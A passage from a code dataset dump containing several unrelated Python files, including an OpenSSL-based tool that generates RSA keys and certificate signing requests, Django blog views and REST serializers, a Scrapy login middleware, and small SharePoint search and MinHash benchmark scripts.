logging.error(f\"Error loading data from file {source}: {e}\")\n exit(1)\n\n\ndef validate_data(source: list) -> list:\n \"\"\"\n Validate source data.\n\n Arguments:\n source (list): List of JSON objects\n\n Returns:\n data (list): List with all JSON objects which have network names.\n\n Logs:\n logging.warning: Number of JSON objects that have no network or cluster name and therefore are not included.\n \"\"\"\n data = []\n network_skipped = cluster_skipped = 0\n\n for item in source:\n if item.get(\"network\"):\n for cluster in item.get(\"cluster\"):\n if cluster.get(\"dns_alias_human_cluster\") or cluster.get(\"dns_alias_tech_cluster\"):\n data.append(item)\n else:\n cluster_skipped += 1\n else:\n network_skipped += 1\n\n if network_skipped > 0:\n logging.warning(f\"{network_skipped} network item(s) ingored due to missing network name!\")\n if cluster_skipped > 0:\n logging.warning(f\"{cluster_skipped} cluster item(s) ignored due to missing cluster name!\")\n\n return data\n\n\ndef get_clusters(source: dict, network: str, cluster: str) -> list:\n \"\"\"\n Get Cluster Infos based on network and cluster name.\n\n Arguments:\n source (dict): Dictionary containing the network and cluster information.\n network (str): Network name to filter for.\n cluster (str): Cluster name to filter for.\n\n Returns:\n clusters (list): List of dictionaries containing the network and cluster information.\n \"\"\"\n network_matches = [network_item for network_item in source if network_item.get(\"network\") == network or network is None]\n clusters = [{\"network\": network_item.get(\"network\"), \"cluster\": cluster_item}\n for network_item in network_matches\n\t\t\t\tif network_item.get(\"cluster\")\n for cluster_item in network_item.get(\"cluster\")\n if cluster_item.get(\"dns_alias_human_cluster\") == cluster or cluster_item.get(\"dns_alias_tech_cluster\") == cluster or cluster is None]\n return clusters\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Private Key Generation ------------------------------------------------------------------------------------------------------------------------------- #\ndef generate_private_keys(cluster: dict, type: str, output_pk: str, input_pk: str, bits: str, debug: bool, count: int):\n \"\"\"\n Generate private RSA keys for a given cluster.\n\n Arguments:\n cluster (dict): A dictionary containing information about a cluster.\n type (str): The type of RSA key file to be generated.\n output_pk (str): The output directory path where the RSA key file will be generated.\n input_pk (str): Path of an already generated private key. If provided the steps of the generation are skipped.\n bits (str): The number of bits to use when generating the key.\n debug (bool): A flag indicating whether to display the debug output of the RSA key information.\n count (int): Running count of generated private keys.\n\n Returns:\n file_path (str): The full path of the generated RSA key file.\n count (int): Running count of generated private keys\n \"\"\"\n cluster_name = cluster.get(\"dns_alias_human_cluster\") if cluster.get(\"dns_alias_human_cluster\") else cluster.get(\"dns_alias_tech_cluster\")\n cluster_name = re.sub(\"\\s+\", \"_\", cluster_name.strip())\n\n filename = f\"id_key_{cluster_name}_ssl.{type}\"\n file_path = os.path.join(output_pk, filename)\n\n if input_pk:\n logging.info(f\"Using provided private key: {input_pk}\")\n return input_pk, count\n if os.path.isfile(file_path):\n logging.info(f\"Using exisitng private key: {filename}\")\n return file_path, count\n else:\n create_rsa_key(filename, file_path, str(bits), debug)\n change_permission_to_read_only(file_path)\n count += 1\n return file_path, count\n\n\ndef create_rsa_key(filename: str, file_path: str, bits: str, debug: bool):\n \"\"\"\n Create an RSA private key using OpenSSL.\n\n Arguments:\n filename (str): The name of the RSA key file to be generated.\n file_path (str): The full path of the RSA key file to be generated.\n bits (str): The number of bits to use when generating the key.\n debug (bool): A flag indicating whether to display the debug output of the RSA key information.\n\n Raises:\n subprocess.CalledProcessError: If there is an error generating the RSA key using OpenSSL.\n\n Logs:\n logging.info: Information about the generated private key.\n logging.error: Information about any errors encountered while generating the RSA key using OpenSSL.\n \"\"\"\n try:\n subprocess.run([\"openssl\", \"genrsa\", \"-out\", file_path, bits], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT, check=True)\n if debug: subprocess.run([\"openssl\", \"rsa\", \"-text\", \"-noout\", \"-in\", file_path], stdout=subprocess.DEVNULL, check=True)\n logging.info(f\"Private key generated: {filename}\")\n except subprocess.CalledProcessError as e:\n logging.error(f\"Error generating RSA key: {e}\")\n exit(1)\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Signing Request Generation --------------------------------------------------------------------------------------------------------------------------- #\ndef generate_signing_requests(cluster: dict, private_key: str, output_sr: str, config: str, digest: str, skip_checking: bool, debug: bool, count: int):\n \"\"\"\n Generate signing requests for the cluster.\n\n Arguments:\n cluster (dict): The cluster information.\n private_key (str): The path to the private key file.\n output_sr (str): The output directory for the signing requests.\n config (str): Path of an already generated config file.\n digest (str): The message digest algorithm to use when generating the signing request.\n skip_checking (bool): A flag indicating whether the SSL parameters have to be manually validated or not.\n debug (bool): A flag indicating whether to display the debug output of the signing request information.\n count (int): Running count of generated Signing Requests.\n\n Returns:\n file_path_sr (str): The path to the generated signing request.\n count (int): Running count of generated Signing Requests.\n\n Logs:\n logging.error: If the SSL parameters where NOT validated.\n logging.info: If the SSL parameters where validated.\n \"\"\"\n cluster_name = cluster.get(\"cluster\").get(\"dns_alias_human_cluster\") if cluster.get(\"cluster\").get(\"dns_alias_human_cluster\") else cluster.get(\"cluster\").get(\"dns_alias_tech_cluster\")\n cluster_name = re.sub(\"\\s+\", \"_\", cluster_name.strip())\n\n date = re.sub(\"\\.\\d+\", \"\", str(datetime.datetime.now())).replace(\"-\", \"\").replace(\" \", \"_\").replace(\":\", \"\")\n\n filename_sr = f\"{date}_id_req_{cluster_name}_ssl.csr\"\n file_path_sr = os.path.join(output_sr, filename_sr)\n\n filename_config = f\"{date}_csr_config_{cluster_name}.conf\"\n file_path_config = os.path.join(output_sr, \"config\", filename_config)\n\n csr_info = get_csr_info(cluster.get(\"network\"), cluster.get(\"cluster\"))\n\n # generate or update config file\n if not config:\n generate_config_file(csr_info, file_path_config)\n else:\n update_config_file(csr_info, config, file_path_config)\n\n if debug or not skip_checking:\n show_signing_request_infos(cluster.get(\"network\"), cluster.get(\"cluster\"), private_key, file_path_sr, file_path_config)\n\n if not skip_checking and input(\"Validate SSL Parameters (Y/N) > \").lower() != \"y\":\n logging.warning(\"SSL Parameters NOT validated!\")\n return None, count\n\n logging.info(\"SSL Parameters validated!\")\n\n create_signing_request(filename_sr, private_key, file_path_sr, file_path_config, digest, debug)\n change_permission_to_read_only(file_path_sr)\n change_permission_to_read_only(file_path_config)\n\n count += 1\n return file_path_sr, count\n\n\ndef generate_config_file(csr_info: dict, config_file_path: str):\n \"\"\"\n Generate a config file template. The method then calls update_config_file() with its given parameters.\n\n Argumemnts:\n csr_info (dict): Information required for Certificate Signing Request.\n config_file_path (str): Config file path.\n \"\"\"\n config_file_template = \"\"\"[req]\nprompt = no\ndistinguished_name = req_distinguished_name\nreq_extensions = req_ext\n\n[req_distinguished_name]\nCN={commonName}\nC={country}\nO={organization}\nemailAddress={emailAddress}\n{organizationalUnits}\n\n[req_ext]\nsubjectAltName = @alt_names\n\n[alt_names]\n{altNames}\n\"\"\"\n try:\n with open(config_file_path, \"w\") as f:\n f.write(config_file_template)\n except PermissionError as e:\n logging.error(f\"Permission for writing denied: {config_file_path}\")\n exit(1)\n logging.info(f\"Successfully created config file: {config_file_path}\")\n\n update_config_file(csr_info, config_file_path, config_file_path)\n\n\ndef update_config_file(csr_info: dict, input_config_path: str, output_config_path: str):\n \"\"\"\n Update a config file based on the given Certificate Signing Request information.\n\n Arguments:\n csr_info (dict): Information required for Certificate Signing Request.\n This dictionary should have the following keys:\n \"commonName\" (str): The common name of the certificate.\n \"country\" (str): The country of the certificate.\n \"organization\" (str): The organization name of the certificate.\n \"emailAddress\" (str): The email address of the certificate.\n \"organizationalUnits\" (list): A list of organizational unit strings.\n \"alt_names\" (dict): A dictionary of alternative names for the certificate, where the key is the name type (e.g. \"DNS\") and the value is a list of alternative names. \n input_config_path (str): Path of the config file template.\n output_config_path (str): Path where the config file will be saved.\n\n Raises:\n KeyError: When the config file template is missing an key.\n PermissionError: When the config file is missing the write permission.\n\n Logs:\n logging.error: Missing key in config file.\n logging.error: Missing write permission.\n logging.info: Information about the updated config file.\n \"\"\"\n with open(input_config_path, \"r\") as f:\n config_file_template = f.read()\n\n try:\n config_file_content = config_file_template.format(\n commonName=csr_info[\"commonName\"],\n country=csr_info[\"country\"],\n organization=csr_info[\"organization\"],\n emailAddress=csr_info[\"emailAddress\"],\n organizationalUnits=get_organizationalUnits(csr_info[\"organizationalUnits\"]),\n altNames=get_altNames(csr_info[\"altNames\"])\n )\n except KeyError as e:\n logging.error(f\"The key {e} is missing in the config file\")\n exit(1)\n\n try:\n with open(output_config_path, \"w\") as f:\n f.write(config_file_content)\n except PermissionError as e:\n logging.error(f\"Permission for writing denied: {output_config_path}\")\n exit(1)\n\n logging.info(f\"Successfully updated config file: {output_config_path}\")\n\n\ndef get_altNames(altNames: dict) -> str:\n \"\"\"\n Get altNames in config file format.\n\n Arguments:\n altNames (dict): Dictorary of the altNames.\n\n Returns:\n altNames (list): altNames in config file format.\n \"\"\"\n return \"\\n\".join(f\"{alt_name_type}.{index}={alt_name}\" for alt_name_type, alt_names in altNames.items() for index, alt_name in enumerate(alt_names, start=1))\n\n\ndef get_organizationalUnits(organizationalUnits: list) -> str:\n \"\"\"\n Get organizationalUnits in config file format.\n\n Arguments:\n organizationalUnits (dict): Dictorary of the organizationalUnits.\n\n Returns:\n organizationalUnits (list): organizationalUnits in config file format.\n \"\"\"\n return \"\\n\".join(f\"{index}.OU={unit}\" for index, unit in enumerate(organizationalUnits, start=1))\n\n\ndef get_csr_info(network: str, cluster: dict) -> dict:\n \"\"\"\n Get Certificate Signing Request information.\n\n Arguments:\n network (str): Network name for the commonName.\n cluster (dict): Clsuter information.\n\n Returns:\n csr_info (dict): Certificate Signing Request information.\n \"\"\"\n csr_info = {\n \"commonName\": f\"{cluster.get('dns_alias_human_cluster')}.intern\",\n \"country\": \"\",\n \"organization\": \"\",\n \"emailAddress\": \"\",\n \"organizationalUnits\": [\n \"\",\n \"SSL Server\",\n \"SSL\"\n ],\n \"altNames\": {\n \"DNS\": get_dns_list(network, cluster),\n \"IP\": get_ip_list(cluster)\n }\n }\n return csr_info\n\n\ndef get_dns_list(network: str, cluster: dict) -> list:\n \"\"\"\n Get all DNS information of the network and cluster.\n\n Arguments:\n network (str): Network name.\n cluster (dict): Clsuter information.\n\n Returns:\n dns_list (list): List of all DNS of the network and cluster.\n \"\"\"\n dns_list = [f\"{network}.intern\"] if network else []\n dns_list.extend([f\"{cluster.get('dns_alias_human_cluster')}.intern\"]\n if cluster.get('dns_alias_human_cluster') else [])\n dns_list.extend([f\"{machine.get('dns_alias_human_machine')}.intern\"\n for machine in cluster.get(\"machines\")\n if machine.get(\"dns_alias_human_machine\")]\n if cluster.get(\"machines\") else [])\n return dns_list\n\n\ndef get_ip_list(cluster: dict) -> list:\n \"\"\"\n Get all IP information of the network and cluster.\n\n Arguments:\n network (str): Network name.\n cluster (dict): Clsuter information.\n\n Returns:\n ip_list (list): List of all IP of the network and cluster.\n \"\"\"\n ip_list = [cluster.get(\"ip\")] if cluster.get(\"ip\") else []\n ip_list.extend([machine.get(\"ipv4_address\")\n for machine in cluster.get(\"machines\")\n if machine.get(\"ipv4_address\")]\n if cluster.get(\"machines\") else [])\n return ip_list\n\n\ndef create_signing_request(filename: str, private_key: str, signing_request: str, config: str, digest: str, debug: bool):\n \"\"\"\n Create a signing request using OpenSSL.\n\n Arguments:\n filename (str): The name of the file to generate the signing request.\n private_key (str): Private Key path.\n signing_request (str): Signing Request path.\n config (str): Config file path.\n digest (str): The message digest algorithm to use when generating the signing request.\n debug (bool): A flag indicating whether to display the debug output of the signing request information.\n\n Raises:\n subprocess.CalledProcessError: If there is an error generating the signing request using OpenSSL.\n\n Logs:\n logging.info: Information about the generated signing request.\n logging.exception: Information about any errors encountered while generating the signing request using OpenSSL.\n \"\"\"\n try:\n with subprocess.Popen([\"openssl\", \"req\", \"-new\", \"-key\", private_key, \"-out\", signing_request, f\"-{digest}\", \"-config\", config], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) as proc:\n stdout_output, _ = proc.communicate()\n if proc.returncode != 0:\n raise subprocess.CalledProcessError(proc.returncode, proc.args, stdout_output)\n\n if debug: subprocess.run([\"openssl\", \"req\", \"-text\", \"-noout\", \"-verify\", \"-in\", signing_request, \"-config\", config], check=True)\n logging.info(f\"Signing Request generated: {filename}\")\n except subprocess.CalledProcessError as e:\n error = re.sub(r\"(\\r\\n|\\r|\\n)\", \"\", str(e.stdout.decode()))\n logging.error(f\"Error generating Signing Request: {error}\")\n exit(1)\n\n\ndef show_signing_request_infos(network: str, cluster: dict, private_key: str, signing_request: str, config: str):\n \"\"\"\n Print textual representation of the SSL parameters\n\n Arguments:\n network (str): Network name.\n cluster (dict): Cluster information.\n private_key (str): Private Key path.\n signing_request (str): Signing Request path.\n config (str): Config file path.\n \"\"\"\n with open(config, \"r\") as file:\n csr_info = file.read()\n\n print(\"-\" * os.get_terminal_size().columns)\n print(f\"Network: {network}\")\n print(f\"Cluster:\")\n print(json.dumps(cluster, indent=4))\n print(f\"\\nPrivate Key: {private_key}\")\n print(f\"Signing Request: {signing_request}\")\n print(f\"Config: {config}\\n\")\n print(csr_info)\n print(\"-\" * os.get_terminal_size().columns)\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Utilities -------------------------------------------------------------------------------------------------------------------------------------------- #\ndef handle_directories(output_pk: str, output_sr: str):\n \"\"\"\n Create the necessary directories for the SSL tool\n\n Arguments:\n output_pk (str): The path of the private key directory\n output_sr (str): The path of the signing request directory\n \"\"\"\n create_directory(output_pk)\n create_directory(output_sr)\n create_directory(f\"{output_sr}/config\")\n\n\ndef create_directory(dir_path: str) -> str:\n \"\"\"\n Create a directory at the specified path.\n\n Arguments:\n dir_path (str): The path of the directory to be created.\n\n Returns:\n dir_path (str): The path of the directory that was created.\n\n Raises:\n OSError: If there was an error while creating the directory.\n\n Logs:\n logging.info: Information about the created directory.\n logging.error: Information about any errors encountered while creating the directory.\n \"\"\"\n try:\n os.makedirs(dir_path, exist_ok=True)\n logging.info(f\"Created directory: {dir_path}\")\n return dir_path\n except OSError as e:\n logging.error(f\"Error while creating directory: {e}\")\n exit(1)\n\n\ndef change_permission_to_read_only(path: str):\n \"\"\"\n Change the file permission to read-only.\n\n Arguments:\n path (str): The path of the file whose permission is to be changed.\n\n Logs:\n logging.info: Information about the file whose permission was changed to read-only.\n \"\"\"\n try:\n os.chmod(path, stat.S_IRUSR)\n logging.info(f\"File permission changed to read-only: {path}\")\n except subprocess.CalledProcessError as e:\n logging.error(f\"Error while changing file permission: {e}\")\n exit(1)\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n\nif __name__ == \"__main__\":\n # parse input arguments\n args = parse_arguments()\n\n # setup logging\n setup_logging(args.output_log)\n\n # log input arguments\n if args.debug:\n input_args = \" \".join([\"[{}={}]\".format(arg, getattr(args, arg)) for arg in vars(args)])\n logging.debug(f\"Script executed with: {input_args}\")\n\n # run main method\n main(args)\n","repo_name":"Knowhere-coding/certiPy","sub_path":"certiPy.py","file_name":"certiPy.py","file_ext":"py","file_size_in_byte":31424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"16540053400","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import ListView, DetailView\nfrom django.db.models import Q, F\nfrom django.http import JsonResponse\n\nfrom .models import Post, Tag, Category\nfrom comment.models import Comment\nfrom comment.forms import CommentForm\n\n\nclass IndexView(ListView):\n model = Post\n template_name = 'post/index.html'\n context_object_name = 'post_list'\n paginate_by = 5\n\n\nclass CategoryView(IndexView):\n def get_queryset(self):\n cate = get_object_or_404(Category, pk=self.kwargs.get('pk'))\n return super(CategoryView, self).get_queryset().filter(category=cate)\n\n\nclass TagView(IndexView):\n def get_queryset(self):\n tag = get_object_or_404(Tag, pk=self.kwargs.get('pk'))\n return super(TagView, self).get_queryset().filter(tags=tag)\n\n\nclass ArchivesView(IndexView):\n def get_queryset(self):\n return super(ArchivesView, self).get_queryset().filter(pub_time__year=self.kwargs.get('year'),\n pub_time__month=self.kwargs.get('month'))\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'post/detail.html'\n context_object_name = 'post'\n\n def get(self, request, *args, **kwargs):\n response = super(PostDetailView, self).get(request, *args, **kwargs)\n self.object.increase_views()\n return response\n\n def get_context_data(self, **kwargs):\n context = super(PostDetailView, self).get_context_data(**kwargs)\n post = super(PostDetailView, self).get_object(queryset=None)\n post_list = Post.objects.filter(id__lt=post.id).order_by('-id')\n pre_post = post_list[0] if len(post_list) > 0 else None\n post_list = Post.objects.filter(id__gt=post.id).order_by('-id')\n next_post = post_list[0] if len(post_list) > 0 else None\n comment_list = Comment.objects.filter(post=post, parent=None)\n comment_form = CommentForm(initial={'post_id': post.id, 'parent':0})\n context.update({\n 'comment_list': comment_list,\n 'comment_form': comment_form,\n 'pre_post': pre_post,\n 'next_post': next_post,\n })\n return context\n\n\ndef search(request):\n q = request.GET.get('q')\n if not q:\n error_msg = '请输入关键词'\n return render(request, 'post/index.html', {'error_msg': error_msg})\n post_list = Post.objects.filter(Q(title__icontains=q) | Q(body__icontains=q))\n return render(request, 'post/index.html', {'post_list':post_list})\n\n\ndef increase_likes(request):\n data = {}\n if request.method == 'POST':\n id = request.POST.get('id')\n if not Post.objects.filter(pk=id).exists():\n data['status'] = 'ERROR'\n data['message'] = '文章不存在'\n else:\n Post.objects.filter(pk=id).update(likes=F('likes')+1)\n data['status'] = 'SUCCESS'\n data['message'] = '点赞成功'\n return JsonResponse(data)\n\n\ndef bad_request(request):\n return render(request, '400.html')\n\n\n# def permission_denied(request):\n# return render(request, '403.html')\n\n\ndef page_not_found(request):\n return render(request, '404.html')\n\n\ndef error(request):\n return render(request, '500.html')\n\n # def pagination_data(self, paginator, page, is_paginated):\n # if not is_paginated:\n # return {}\n # left = []\n # right = []\n # left_has_more = []\n # right_has_more = []\n # first = False\n # last = False\n # page_num = page.number\n # total = paginator.num_pages\n #\n # page_range = paginator.page_range\n #\n # if page_num == 1:\n # right = page_range[page_num: page_num+2]\n # if right[-1] < total -1:\n # right_has_more = True\n # if right[-1] < total:\n # last = True\n #\n # elif page_num == total:\n # left = page_range[page_num - 3 if page_num - 3 > 0 else page_num-1]\n # if left[0] > 2:\n # left_has_more = True\n # if left[0] > 1:\n # first = True\n # else:\n # left = page_range[(page_num - 3) if (page_num - 3) > 0 else 0:page_num - 1]\n # right = page_range[page_num:page_num + 2]\n # if right[-1] < total- 1:\n # right_has_more = True\n # if right[-1] < total:\n # last = True\n # if left[0] > 2:\n # left_has_more = True\n # if left[0] > 1:\n # first = True\n #\n # data = {\n # 'left': left,\n # 'right': right,\n # 'left_has_more': left_has_more,\n # 'right_has_more': right_has_more,\n # 'first': first,\n # 'last': last,\n # }\n #\n # return data\n","repo_name":"Frankssss/DjangoBlog","sub_path":"apps/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13591011914","text":"\"\"\"Calculate Approximate Similarity\n\nUsage:\n better_partition_mitdwh.py \n\"\"\"\n\nimport gc\nimport hashlib\nimport time\n\nfrom docopt import docopt\n\nfrom base_mitdwh import base_mitdwh\nfrom datasketch import BetterWeightedPartitionMinHash\n\n\ndef better_partition_mitdwh(mitdwh_path, filename, hash_func, k):\n base_mitdwh(mitdwh_path, BetterWeightedPartitionMinHash, filename, hash_func, k)\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__)\n hashes = [(hashlib.sha1, 'sha1')]\n k_vals = [32, 64, 128]\n for k in k_vals:\n for i in range(len(hashes)):\n start_time = time.time()\n better_partition_mitdwh(arguments[''],\n 'better_partition_mitdwh_7/k_{}/{}-{}-data.json'.format(k, k, hashes[i][1]),\n hashes[i][0], k)\n with open('better_partition_mitdwh_7/k_{}/{}-{}-time.txt'.format(k, k, hashes[i][1]), 'w+') as f:\n f.write(\"--- %s seconds ---\" % (time.time() - start_time))\n gc.collect()\n","repo_name":"demitrin/similarity-playground","sub_path":"dataset_simulations/better_partition_mitdwh.py","file_name":"better_partition_mitdwh.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35229156715","text":"from office365.sharepoint.client_context import ClientContext\nfrom tests import test_site_url, test_user_credentials\n\nctx = ClientContext(test_site_url).with_credentials(test_user_credentials)\nresult = ctx.search.query(\"IsDocument:1\", row_limit=10).execute_query()\nfor row in result.value.PrimaryQueryResult.RelevantResults.Table.Rows:\n print(row.Cells[\"Path\"])\n\nprint(\"Next query..\")\n\nresult = ctx.search.query(\"IsDocument:0\", row_limit=5).execute_query()\nfor row in result.value.PrimaryQueryResult.RelevantResults.Table.Rows:\n print(row.Cells[\"Path\"])\n","repo_name":"Maddisan/Office365-REST-Python-Client","sub_path":"examples/sharepoint/search/search_simple.py","file_name":"search_simple.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"18558424959","text":"import random\nfrom twisted.internet.defer import maybeDeferred\nfrom scrapy.http import Request, Response\nfrom scrapy import log, signals\nfrom scrapy.exceptions import IgnoreRequest\n\n\ndef to_callback(string_or_method_, obj):\n if string_or_method_ is None:\n method = lambda *args, **kwargs: None\n elif isinstance(string_or_method_, basestring):\n method = getattr(obj, string_or_method_)\n else:\n method = string_or_method_\n return method\n\n\nclass LoginError(Exception):\n pass\n\n\nclass LoginMiddleware(object):\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler)\n\n def __init__(self, crawler):\n self.crawler = crawler\n self.queue = []\n self.paused = False\n self.fail_if_not_logged_in = crawler.settings.get(\n 'LOGIN_FAIL_IF_NOT_LOGGED_IN', True\n )\n self.max_attemps = crawler.settings.getint('LOGIN_MAX_ATTEMPS', 10)\n self.attemp = 0\n self.debug = crawler.settings.get('LOGIN_DEBUG', False)\n crawler.signals.connect(self.spider_idle,\n signal=signals.spider_idle)\n\n def process_request(self, request, spider):\n if request.meta.get('captcha_request', False):\n return\n if request.meta.get('login_request', False):\n return\n if not request.meta.get('login_final_request', False):\n self._enqueue_if_paused(request, spider)\n\n def process_response(self, request, response, spider):\n if request.meta.get('login_request', False):\n return response\n if request.meta.get('captcha_request', False):\n return response\n if not request.meta.get('login_final_request', False):\n self._enqueue_if_paused(request, spider)\n max_attemps = getattr(spider, 'login_max_attemps', self.max_attemps)\n if max_attemps > 0 and self.attemp > max_attemps:\n raise IgnoreRequest('Max login attemps exceeded')\n self.do_login = getattr(spider, 'do_login', None)\n self.check_login = getattr(spider, 'check_login', None)\n self.accounts = getattr(spider, 'accounts', None)\n self.username = getattr(spider, 'username', None)\n self.password = getattr(spider, 'password', None)\n login_callback = getattr(spider, 'login_callback', None)\n self.login_callback = to_callback(login_callback, spider)\n self.dont_resume = getattr(\n spider, 'login_dont_resume', False\n )\n if self.dont_resume and login_callback is None:\n spider.log('You should set login_callback if '\n 'login_dont_resume is set to True, '\n 'otherwise no request is made after login',\n level=log.WARNING)\n self.spider = spider\n\n if not all((self.check_login, self.do_login,\n self.accounts or self.username and self.password)):\n return response\n # Determine login status\n try:\n login_status = self.check_login(response)\n except LoginError as exc:\n login_successful = False\n login_message = exc.message\n else:\n login_successful = bool(login_status)\n login_message = None\n\n if login_successful:\n if self.attemp > 0:\n spider.log('Logged in', level=log.INFO)\n self._resume_crawling()\n self.attemp = 0\n return response\n else:\n self._pause_crawling()\n self._enqueue(request, spider)\n if not self.username or not self.password:\n self.username, self.password = random.choice(self.accounts)\n if login_message:\n spider.log('Not logged in: {}'.format(login_message),\n level=log.WARNING)\n else:\n spider.log('Not logged in', level=log.WARNING)\n self.attemp += 1\n if max_attemps > 0 and self.attemp > max_attemps:\n spider.log('Max login attemps exceeded', level=log.ERROR)\n raise IgnoreRequest('Max login attemps exceeded')\n spider.log('Logging in (attemp {}/{})'\n .format(self.attemp, max_attemps),\n level=log.INFO)\n dfd = maybeDeferred(self.do_login, response, self.username,\n self.password)\n dfd.addCallbacks(self.deffered_login_callback,\n self.deffered_login_errback)\n raise IgnoreRequest()\n\n def deffered_login_callback(self, result):\n if isinstance(result, Request):\n result.callback = self.login_callback\n result.dont_filter = True\n result.meta['login_final_request'] = True\n self.crawler.engine.crawl(result, self.spider)\n elif isinstance(result, Response):\n pass\n else:\n raise RuntimeError('Deferred has been resolved as non-Request: {}'\n .format(type(result)))\n\n def deffered_login_errback(self, failure):\n self.spider.log('Login failed: {}'.format(failure.getErrorMessage()))\n self._resume_crawling()\n\n def spider_idle(self, spider):\n self._resume_crawling(force=True)\n\n def _pause_crawling(self):\n self.paused = True\n\n def _resume_crawling(self, force=False):\n if not self.paused:\n return\n self.paused = False\n if self.dont_resume and not force:\n self.spider.log('Not resuming crawl')\n elif self.queue:\n self.spider.log('Resuming crawl: {}'.format(self.queue),\n level=log.DEBUG)\n for request, spider in self.queue:\n request.dont_filter = True\n self.crawler.engine.crawl(request, spider)\n\n self.queue[:] = []\n\n def _enqueue_if_paused(self, request, spider):\n if self.paused:\n self._enqueue(request, spider)\n raise IgnoreRequest('Crawling paused, because login takes place')\n\n def _enqueue(self, request, spider):\n self.queue.append((request, spider))\n","repo_name":"TeamHG-Memex/scrapy-login","sub_path":"scrapy_login/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"10352020573","text":"from src.scrapped_data_decoders.decoder import Decoder\nfrom src.scrapped_data_decoders.utils import get_with_default\nfrom collections import defaultdict\n\nclass MainInPeopleDecoder(Decoder):\n def __init__(self):\n self.id2value = defaultdict(lambda: \"Unknown\")\n self.id2value.update({\n 1: \"Intelligence and Creativity\",\n 2: \"Kindness and Honesty\",\n 3: \"Beauty and Health\",\n 4: \"Authority and Wealth\",\n 5: \"Courage and Perseverance\",\n 6: \"Humor and Zest\",\n })\n \n def decode(self, user_dict: dict) -> dict[str, int|str]:\n id = get_with_default(user_dict, ['personal', 'people_main'], default=0)\n value = self.id2value[id]\n return {'people_main_id': id, 'people_main_value': value}\n\n","repo_name":"implausibleDeniability/thesis","sub_path":"src/scrapped_data_decoders/main_in_people_decoder.py","file_name":"main_in_people_decoder.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8721030534","text":"from rest_framework import serializers\nfrom .models import Notification, User, Food, Order, OrderItem, Address, Payment, Review, Cart, CartItem, Category, FoodImage\n\nimport re\nemail_pattern = re.compile(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\n\nclass LoginSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['email', 'password']\n\nclass RegisterSerializer(serializers.ModelSerializer):\n password=serializers.CharField(max_length=32,min_length=8,write_only = True)\n\n class Meta:\n model = User\n fields = ['name', 'email', 'password', 'phone', 'type_of_user']\n\n def validate(self,attrs):\n email = attrs.get('email',' ')\n\n if not email_pattern.match(email):\n raise serializers.ValidationError('Please enter a valid email!')\n return attrs\n\n def create(self,validated_data):\n validated_data['is_active'] = True\n return User.objects.create_user(**validated_data)\n\nclass ForgotPasswordSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['email']\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = '__all__'\n\nclass AddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = Address\n fields = '__all__'\n\nclass FoodImageSerializer(serializers.ModelSerializer):\n class Meta:\n model = FoodImage\n fields = '__all__'\n\nclass FoodViewSerializer(serializers.ModelSerializer):\n category = CategorySerializer(read_only=True)\n user = RegisterSerializer(read_only=True)\n #food_image = FoodImageSerializer(many=True, required=False)\n restaurant = AddressSerializer(read_only=True)\n food_image = serializers.SerializerMethodField()\n\n def get_food_image(self, obj):\n #data = {...} # your logic\n food_images = FoodImage.objects.filter(food=obj)\n if food_images:\n field_serializer = FoodImageSerializer(food_images.first())\n return field_serializer.data\n\n class Meta:\n model = Food\n fields = ['id', 'name', 'age', 'description', 'price', 'category', 'user', 'quantity', 'is_available','is_verified', 'restaurant','food_image']\n\nclass FoodSerializer(serializers.ModelSerializer):\n #category = CategorySerializer(read_only=True)\n #user = RegisterSerializer(read_only=True)\n #food_image = FoodImageSerializer(many=True, required=False)\n #food_image = serializers.FileField()\n #restaurant = AddressSerializer(read_only=True)\n class Meta:\n model = Food\n fields = ['id', 'name', 'age', 'description', 'price', 'category', 'user', 'quantity', 'is_available','is_verified', 'restaurant']\n\n def create(self, validated_data):\n # category_data = validated_data.pop('category')\n # #user_data = validated_data.pop('user')\n #food_image_data = validated_data.pop('food_image', None)\n # #restaurant_data = validated_data.pop('restaurant')\n # category,k = Category.objects.get_or_create(**category_data)\n # #user = User.objects.get_or_create(**user_data)\n # #restaurant = Address.objects.get_or_create(**restaurant_data)\n food = Food.objects.create(**validated_data)\n #if food_image_data:\n #if len(food_image_data) == 1:\n #FoodImage.objects.create(food=food, image=food_image_data)\n #else:\n #for image in food_image_data:\n #FoodImage.objects.create(food=food, image=image)\n return food\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = '__all__'\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n food = FoodSerializer(read_only=True)\n class Meta:\n model = OrderItem\n fields = '__all__'\n\nclass PaymentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Payment\n fields = '__all__'\n\nclass ReviewSerializer(serializers.ModelSerializer):\n class Meta:\n model = Review\n fields = '__all__'\n\nclass CartSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cart\n 